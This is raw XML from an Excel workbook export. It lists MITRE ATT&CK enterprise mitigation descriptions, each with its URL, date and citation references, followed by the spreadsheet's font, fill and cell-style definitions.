  <si>
    <t>domain</t>
  </si>
  <si>
    <t>relationship citations</t>
  </si>
  <si>
    <t>Configure features related to account use like login attempt lockouts, specific login times, etc.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1036</t>
  </si>
  <si>
    <t>11 June 2019</t>
  </si>
  <si>
    <t>enterprise-attack</t>
  </si>
  <si>
    <t>(Citation: Microsoft Common Conditional Access Policies)</t>
  </si>
  <si>
    <t>Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1015</t>
  </si>
  <si>
    <t>(Citation: Mandiant Defend UNC2452 White Paper),(Citation: Microsoft Protected Users Security Group),(Citation: Microsoft MS14-025),(Citation: AdSecurity DCSync Sept 2015),(Citation: Microsoft Netdom Trust Sept 2012),(Citation: AdSecurity Kerberos GT Aug 2015),(Citation: Microsoft Replication ACL),(Citation: ADSecurity Mimikatz DCSync),(Citation: Microsoft SID Filtering Quarantining Jan 2009),(Citation: SpecterOps Certified Pre Owned),(Citation: ADSecurity Kerberos and KRBTGT),(Citation: STIG krbtgt reset),(Citation: Microsoft Trust Considerations Nov 2014)</t>
  </si>
  <si>
    <t>Use signatures or heuristics to detect malicious software.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1049</t>
  </si>
  <si>
    <t>(Citation: Anomali Template Injection MAR 2018),(Citation: Microsoft AMSI June 2015),(Citation: Chkrootkit Main),(Citation: Mandiant Cloudy Logs 2023),(Citation: SourceForge rkhunter)</t>
  </si>
  <si>
    <t>This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1013</t>
  </si>
  <si>
    <t>25 October 2017</t>
  </si>
  <si>
    <t>enterprise-attack,mobile-attack</t>
  </si>
  <si>
    <t>(Citation: FireEye DLL Side-Loading),(Citation: Comparitech Replay Attack),(Citation: Bugcrowd Replay Attack),(Citation: Apple Developer Doco Hardened Runtime),(Citation: Apple App Security Overview)</t>
  </si>
  <si>
    <t>Restrict execution of code to a virtual environment on or in transit to an endpoint system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1048</t>
  </si>
  <si>
    <t>(Citation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: Microsoft Protected View),(Citation: Windows Blogs Microsoft Edge Sandbox),(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1047</t>
  </si>
  <si>
    <t>(Citation: Github UACMe),(Citation: Cisco IOS Software Integrity Assurance - Image File Integrity),(Citation: Mandiant Azure AD Backdoors),(Citation: Powersploit),(Citation: Microsoft CreateProcess),(Citation: Amazon S3 Security, 2019),(Citation: SpecterOps Certified Pre Owned),(Citation: Cisco IOS Software Integrity Assurance - Image File Verification),(Citation: Mandiant Cloudy Logs 2023),(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2),(Citation: GitHub Bloodhound),(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019),(Citation: GitHub PSPKIAudit),(Citation: Microsoft Manage Mail Flow Rules 2023),(Citation: Vulnerability and Exploit Detector),(Citation: Kifarunix - Task Scheduling in Linux),(Citation: FireEye ADFS),(Citation: GitHub Certify),(Citation: Microsoft Sxstrace),(Citation: Secureworks - AT.exe Scheduled Task),(Citation: Pfammatter - Hidden Inbox Rules),(Citation: Microsoft Preauthentication Jul 2012),(Citation: Microsoft Dynamic-Link Library Security),(Citation: Cisco IOS Software Integrity Assurance - Change Control),(Citation: Microsoft Get-InboxRule),(Citation: MagicWeb),(Citation: ADSecurity Finding Passwords in SYSVOL),(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1040</t>
  </si>
  <si>
    <t>(Citation: Enigma Reviving DDE Jan 2018),(Citation: Microsoft driver block rules),(Citation: Microsoft_rec_block_rules),(Citation: Microsoft ASR Nov 2017),(Citation: Malicious Driver Reporting Center),(Citation: win10_asr),(Citation: Microsoft ASR Obfuscation)</t>
  </si>
  <si>
    <t>Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1046</t>
  </si>
  <si>
    <t>(Citation: Intel Hardware-based Security Technologies),(Citation: TCG Trusted Platform Module),(Citation: Microsoft TESTSIGNING Feb 2021),(Citation: ESET LoJax Sept 2018),(Citation: Cisco IOS Software Integrity Assurance - Secure Boot),(Citation: TechNet Secure Boot Process)</t>
  </si>
  <si>
    <t>Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1045</t>
  </si>
  <si>
    <t>(Citation: Content trust in Docker),(Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS),(Citation: Content trust in Azure Container Registry),(Citation: applescript signing)</t>
  </si>
  <si>
    <t>Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1043</t>
  </si>
  <si>
    <t>(Citation: Microsoft Credential Guard April 2017),(Citation: TechNet Credential Guard),(Citation: Microsoft Enable Cred Guard April 2017),(Citation: GitHub SHB Credential Guard),(Citation: Cisco IOS Software Integrity Assurance - AAA),(Citation: Cisco IOS Software Integrity Assurance - Credentials Management)</t>
  </si>
  <si>
    <t>Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1053</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Palo Alto Ransomware in Public Clouds 2022),(Citation: Ready.gov IT DRP),(Citation: Rhino S3 Ransomware Part 2)</t>
  </si>
  <si>
    <t>Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1057</t>
  </si>
  <si>
    <t>Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1042</t>
  </si>
  <si>
    <t>(Citation: Microsoft BEC Campaign),(Citation: Microsoft AlwaysInstallElevated 2018),(Citation: Microsoft Disable DCOM),(Citation: TechNet Screensaver GP),(Citation: TechNet Removable Media Control),(Citation: ADSecurity Windows Secure Baseline),(Citation: SpecterOps Certified Pre Owned),(Citation: Microsoft Network access Credential Manager),(Citation: Gmail Delegation),(Citation: Amazon AWS IMDS V2),(Citation: Symantec SSH and ssh-agent),(Citation: Microsoft DDE Advisory Nov 2017),(Citation: GitHub MOTW),(Citation: Microsoft Disable VBA Jan 2020),(Citation: BleepingComputer DDE Disabled in Word Dec 2017),(Citation: Microsoft Disable Autorun),(Citation: MRWLabs Office Persistence Add-ins),(Citation: ITSyndicate Disabling PHP functions),(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing),(Citation: Microsoft ADV170021 Dec 2017),(Citation: GitHub Disable DDEAUTO Oct 2017),(Citation: Microsoft Disable Macros)</t>
  </si>
  <si>
    <t>This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1055</t>
  </si>
  <si>
    <t>23 July 2019</t>
  </si>
  <si>
    <t>Protect sensitive information with strong encryption.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1041</t>
  </si>
  <si>
    <t>(Citation: Microsoft Azure Storage Security, 2019),(Citation: US-CERT TA17-156A SNMP Abuse 2017),(Citation: Amazon S3 Security, 2019),(Citation: SpecterOps Certified Pre Owned),(Citation: Google Cloud Encryption Key Rotation),(Citation: Metcalf 2015),(Citation: AdSecurity Cracking Kerberos Dec 2015),(Citation: Microsoft Primary Refresh Token)</t>
  </si>
  <si>
    <t>Prevent modification of environment variables by unauthorized users and groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1039</t>
  </si>
  <si>
    <t>(Citation: Securing bash history)</t>
  </si>
  <si>
    <t>Block execution of code on a system through application control, and/or script blocking.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1038</t>
  </si>
  <si>
    <t>(Citation: Microsoft Using Software Restriction ),(Citation: Default VBS macros Blocking ),(Citation: Beechey 2010),(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: Microsoft ISAPICGIRestriction 2016),(Citation: Kernel.org Restrict Kernel Module),(Citation: Corio 2008),(Citation: Microsoft WDAC),(Citation: LKM loading kernel restrictions),(Citation: NSA MS AppLocker),(Citation: Technospot Chrome Extensions GP),(Citation: Microsoft Application Lockdown),(Citation: Dormann Dangers of VHD 2019),(Citation: Windows Commands JPCERT),(Citation: Microsoft Driver Block Rules),(Citation: file_upload_attacks_pt2),(Citation: TechNet Applocker vs SRP),(Citation: Increasing Linux kernel integrity),(Citation: Microsoft PowerShell CLM),(Citation: Microsoft Windows Defender Application Control),(Citation: Kernel Self Protection Project),(Citation: Kubernetes Security Context),(Citation: Wikibooks Grsecurity),(Citation: SANS Application Whitelisting),(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1050</t>
  </si>
  <si>
    <t>(Citation: Beechey 2010),(Citation: Microsoft Windows Defender Application Control),(Citation: Corio 2008),(Citation: Wikipedia Control Flow Integrity),(Citation: Secure Host Baseline EMET),(Citation: NSA MS AppLocker),(Citation: TechNet Applocker vs SRP),(Citation: Windows Commands JPCERT),(Citation: TechNet Moving Beyond EMET)</t>
  </si>
  <si>
    <t>Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1037</t>
  </si>
  <si>
    <t>(Citation: CERT-EU DDoS March 2017),(Citation: US-CERT TA17-156A SNMP Abuse 2017),(Citation: Cisco ARP Poisoning Mitigation 2016),(Citation: ntlm_relaying_kerberos_del),(Citation: US-CERT SMB Security),(Citation: Secure Ideas SMB Relay),(Citation: US-CERT APT Energy Oct 2017),(Citation: Microsoft SMB Packet Signing),(Citation: RedLock Instance Metadata API 2018),(Citation: Microsoft Preventing SMB),(Citation: byt3bl33d3r NTLM Relaying),(Citation: Juniper DAI 2020)</t>
  </si>
  <si>
    <t>Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1035</t>
  </si>
  <si>
    <t>(Citation: Wikipedia 802.1x),(Citation: Kubernetes API Control Access),(Citation: Kubernetes Cloud Native Security),(Citation: Docker Daemon Socket Protect),(Citation: TechNet RDP Gateway),(Citation: Microsoft AKS Azure AD 2023)</t>
  </si>
  <si>
    <t>Block users or groups from installing or using unapproved hardware on systems, including USB devices.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1034</t>
  </si>
  <si>
    <t>Block users or groups from installing unapproved software.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1033</t>
  </si>
  <si>
    <t>Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1032</t>
  </si>
  <si>
    <t>(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: Evilginx 2 July 2018),(Citation: AWS - IAM Console Best Practices),(Citation: Microsoft Nobelium Admin Privileges),(Citation: Amazon S3 Security, 2019),(Citation: Mandiant APT29 Microsoft 365 2022),(Citation: MFA Fatigue Attacks - PortSwigger),(Citation: Berkley Secure),(Citation: Expel IO Evil in AWS),(Citation: Microsoft - Device Registration),(Citation: CISA MFA PrintNightmare)</t>
  </si>
  <si>
    <t>Use intrusion detection signatures to block traffic at network boundaries.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1031</t>
  </si>
  <si>
    <t>(Citation: Cisco Umbrella DGA Brute Force),(Citation: University of Birmingham C2),(Citation: Anomali Template Injection MAR 2018),(Citation: dhcp_serv_op_events),(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018),(Citation: Cybereason Dissecting DGAs),(Citation: US-CERT-TA18-106A),(Citation: Akamai DGA Mitigation)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/mitigations/M1030</t>
  </si>
  <si>
    <t>(Citation: TechNet Firewall Design),(Citation: Harmj0y Domain Trusts),(Citation: NSA Spotting),(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1028</t>
  </si>
  <si>
    <t>(Citation: Microsoft BITS),(Citation: TechNet RDP NLA),(Citation: Microsoft Disable NTLM Nov 2012),(Citation: UCF STIG Elevation Account Enumeration),(Citation: Apple Developer Doco Hardened Runtime),(Citation: Windows RDP Sessions),(Citation: TechNet Server Operator Scheduled Task),(Citation: Microsoft GPO Bluetooth FEB 2009),(Citation: EnableMPRNotifications),(Citation: TechNet Removable Media Control),(Citation: reagentc_cmd),(Citation: Microsoft WDigest Mit),(Citation: Tilbury Windows Credentials),(Citation: Seqrite DoubleExtension),(Citation: SpectorOps Code Signing Dec 2017),(Citation: TechRepublic Wireless GPO FEB 2009),(Citation: HowToGeek ShowExtension),(Citation: Windows Anonymous Enumeration of SAM Accounts)</t>
  </si>
  <si>
    <t>Set and enforce secure password policies for accounts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1027</t>
  </si>
  <si>
    <t>(Citation: Microsoft Install Password Filter n.d),(Citation: AWS - IAM Console Best Practices),(Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet),(Citation: AdSecurity Cracking Kerberos Dec 2015),(Citation: NIST 800-63-3),(Citation: store_pwd_rev_enc)</t>
  </si>
  <si>
    <t>This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1056</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1026</t>
  </si>
  <si>
    <t>(Citation: Microsoft Remote Use of Local),(Citation: AWS Setting Up Run Command),(Citation: Microsoft Replace Process Token),(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: CyberArk Labs Safe Mode 2016),(Citation: Microsoft runas),(Citation: Microsoft PS JEA),(Citation: AdSecurity Cracking Kerberos Dec 2015),(Citation: Mandiant Azure Run Command 2021),(Citation: Kubernetes Service Accounts),(Citation: Microsoft Azure security baseline for Azure Active Directory),(Citation: Cisco IOS Software Integrity Assurance - AAA),(Citation: FireEye ADFS),(Citation: ADSecurity AD Kerberos Attacks),(Citation: FireEye WMI 2015),(Citation: Microsoft Requests for Azure AD Roles in Privileged Identity Management),(Citation: Microsoft Securing Privileged Access),(Citation: Microsoft Security Alerts for Azure AD Roles),(Citation: Microsoft System Wide Com Keys),(Citation: TechNet Scheduling Priority),(Citation: Microsoft COM ACL),(Citation: Protecting Microsoft 365 From On-Premises Attacks),(Citation: Microsoft Create Token),(Citation: Kubernetes Hardening Guide),(Citation: MagicWeb),(Citation: TechNet Least Privilege),(Citation: Tilbury Windows Credentials),(Citation: Kubernetes Admission Controllers),(Citation: Microsoft Process Wide Com Keys),(Citation: Netspi PowerShell Execution Policy Bypass),(Citation: TechNet Credential Theft)</t>
  </si>
  <si>
    <t>Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1025</t>
  </si>
  <si>
    <t>(Citation: Microsoft LSA Protection Mar 2014),(Citation: Microsoft LSA),(Citation: Microsoft Configure LSA),(Citation: Graeber 2014)</t>
  </si>
  <si>
    <t>Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1029</t>
  </si>
  <si>
    <t>(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1022</t>
  </si>
  <si>
    <t>(Citation: Microsoft W32Time May 2017),(Citation: Microsoft ETW May 2018),(Citation: piazza launch agent mitigation),(Citation: cisco_deploy_rsa_keys),(Citation: create_sym_links),(Citation: InsiderThreat NTFS EA Oct 2017),(Citation: win_xml_evt_log)</t>
  </si>
  <si>
    <t>Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1044</t>
  </si>
  <si>
    <t>(Citation: Microsoft More information about DLL),(Citation: Microsoft DLL Security),(Citation: Microsoft Dynamic Link Library Search Order)</t>
  </si>
  <si>
    <t>Restrict the ability to modify certain hives or keys in the Windows Registry.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1024</t>
  </si>
  <si>
    <t>(Citation: Microsoft System Services Fundamentals),(Citation: Microsoft W32Time May 2017),(Citation: def_ev_win_event_logging)</t>
  </si>
  <si>
    <t>Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1021</t>
  </si>
  <si>
    <t>(Citation: Microsoft Azure AD Admin Consent)</t>
  </si>
  <si>
    <t>Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1020</t>
  </si>
  <si>
    <t>Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1054</t>
  </si>
  <si>
    <t>(Citation: Cisco Securing SNMP),(Citation: Palo Alto Office Test Sofacy),(Citation: ACSC Email Spoofing),(Citation: CyberArk Labs Safe Mode 2016),(Citation: GitHub Disable DDEAUTO Oct 2017),(Citation: Wikipedia HPKP),(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018),(Citation: Microsoft Anti Spoofing),(Citation: Chromium HSTS),(Citation: CloudSploit - Unused AWS Regions),(Citation: Enigma Reviving DDE Jan 2018)</t>
  </si>
  <si>
    <t>A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1019</t>
  </si>
  <si>
    <t>Perform regular software updates to mitigate exploitation risk.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1051</t>
  </si>
  <si>
    <t>(Citation: Github UACMe),(Citation: Cisco Blog Legacy Device Attacks),(Citation: SensePost Outlook Forms),(Citation: ADSecurity Finding Passwords in SYSVOL),(Citation: SensePost Outlook Home Page),(Citation: NSA Spotting),(Citation: MS14-025)</t>
  </si>
  <si>
    <t>Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1052</t>
  </si>
  <si>
    <t>(Citation: Executable Installers are Vulnerable),(Citation: GitHub IAD Secure Host Baseline UAC Filtering)</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to user accounts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1018</t>
  </si>
  <si>
    <t>(Citation: Microsoft ETW May 2018),(Citation: Microsoft SolarWinds Customer Guidance),(Citation: Symantec BITS May 2007),(Citation: MDMProfileConfigMacOS),(Citation: Amazon S3 Security, 2019),(Citation: Microsoft Azure Storage Security, 2019),(Citation: UCF STIG Symbolic Links),(Citation: Cisco IOS Software Integrity Assurance - AAA),(Citation: Amazon  AWS Temporary Security Credentials),(Citation: Mandiant M-Trends 2020),(Citation: Wald0 Guide to GPOs),(Citation: Apple TN2459 Kernel Extensions),(Citation: Office 365 Partner Relationships),(Citation: Microsoft WMI Filters),(Citation: Microsoft GPO Security Filtering),(Citation: Crowdstrike AWS User Federation Persistence),(Citation: NSA and ASD Detect and Prevent Web Shells 2020),(Citation: Kubernetes Hardening Guide),(Citation: Kubernetes RBAC),(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1017</t>
  </si>
  <si>
    <t>(Citation: Re-Open windows on Mac),(Citation: CISA Phishing)</t>
  </si>
  <si>
    <t>Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1016</t>
  </si>
  <si>
    <t>(Citation: OWASP Top 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</si>
</sst>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Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF444444"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFFFFFF"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF006100"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="19">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9E1F2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF2CC"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF92D050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF7030A0"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF404040"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF4F4F"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF7757"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF2F57B"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF7D9CFF"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6EFCE"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="5"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.59999389629810485"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="6" tint="0.39997558519241921"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7" tint="0.79998168889431442"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC000"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF305496"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.79998168889431442"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="24">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style="thin">
        <color theme="1"/>
      </top>
      <bottom style="thin">
        <color theme="1"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="5">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="6" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="top"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="67">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="6" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="6" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="7" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="8" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="9" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="10" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
